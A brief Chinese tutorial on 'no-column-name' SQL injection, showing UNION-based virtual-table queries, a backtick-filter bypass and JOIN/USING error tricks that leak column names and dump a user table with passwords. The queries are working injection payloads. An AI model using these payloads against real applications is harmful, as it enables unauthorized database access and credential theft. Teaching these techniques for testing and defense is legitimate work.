WEB安全--SQL注入--无列名注入
一、原理:
当我们只知道表名不知道列名时,可以通过联合查询创建虚拟字段查询信息,或者是利用join、using关键字报错得到列名。
二、利用手段:
2.1)创建虚表查询:
#创建虚表
select 1,2,3 union select * from user;
#查询第二列数据
select `2` from (select 1,2,3 union select * from user)xxx;
当反引号 ` 被过滤时,可以使用如下方式查询:
select b from (select 1 as a,2 as b,3 as c union select * from user)xxx;
2.2)join+using爆出列名:
# 得到 id 列名重复报错
select * from user where id='1' union all select * from (select * from user as a join user as b)as c;
# 得到 username 列名重复报错
select * from user where id='1' union all select * from (select * from user as a join user as b using(id))as c;
# 得到 password 列名重复报错
select * from user where id='1' union all select * from (select * from user as a join user as b using(id,username))as c;
# 得到 user 表中的数据
select * from user where id='1' union all select * from (select * from user as a join user as b using(id,username,password))as c;